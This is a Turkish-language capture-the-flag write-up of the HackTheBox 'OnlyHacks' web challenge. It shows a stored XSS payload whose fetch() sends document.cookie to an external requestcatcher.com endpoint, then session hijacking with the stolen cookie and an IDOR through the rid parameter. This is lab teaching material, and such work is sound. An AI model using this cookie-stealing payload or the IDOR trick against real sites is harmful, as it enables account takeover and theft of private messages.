HackTheBox Challenges | OnlyHacks WriteUp
Bu yazımda HackTheBox platformunda yer alan “OnlyHacks” isimli meydan okumayı çözeceğim. Meydan okuma sevgililer gününe özel olarak hazırlanmış kolay seviye bir web uygulamasıdır.
Kayıt olduktan sonra doğrudan eşleşmelerin yapıldığı sayfaya yönlendiriliyoruz. Gösterilen herkesi beğendikten sonra “Matches” sayfasına yöneliyoruz ve bir kişi ile eşleştiğimizi görüyoruz.
Mesajlaşma alanında html etiketleri ve javascript kodları çalıştırabiliyoruz. Mesajlarımızın okunduğunu bildiğimiz için cookie bilgilerini almamızı sağlayacak bir javascript kodu yazabiliriz.
1
2
3
<script>
fetch("https://test12345.requestcatcher.com/cookie?=" + document.cookie);
</script>
Cookie bilgilerini yakalamak için requestcatcher.com sitesini kullanacağım.
Elde ettiğimiz cookie bilgilerini kopyalayıp devtools aracılığıyla kendimizinkiyle değiştiriyoruz. Böylece sayfayı yenilediğimizde bayrağı başka bir kişiden gelen mesaj içerisinde buluyoruz.
Bunun haricinde mesajları görüntülediğimiz sayfaya rid parametresi ile yönlendirildiğimizi fark etmişsinizdir. Buradaki değeri değiştirdiğimizde aynı şekilde bayrağı görebiliyoruz.
Kısaca web uygulamasında hem XSS zafiyeti hem de IDOR zafiyeti barınıyor.